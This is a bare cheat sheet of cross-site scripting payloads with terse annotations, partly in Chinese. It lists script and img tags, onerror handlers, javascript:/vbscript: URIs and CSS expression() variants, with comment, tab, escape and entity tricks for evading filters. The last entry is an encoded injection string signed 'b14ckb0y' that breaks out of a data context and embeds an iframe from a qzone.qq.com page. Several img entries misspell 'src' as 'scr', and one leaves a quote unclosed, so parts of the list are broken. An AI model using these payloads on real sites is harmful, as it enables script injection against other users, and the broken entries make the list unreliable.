<script>alert("跨站")</script> (most commonly used)
<img scr=javascript:alert("跨站")></img>
<img scr="javascript: alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (the whitespace is produced with the Tab key)
<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity <div style={left:&#x0065;xpression (alert('xss'))}></div>
unicode <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["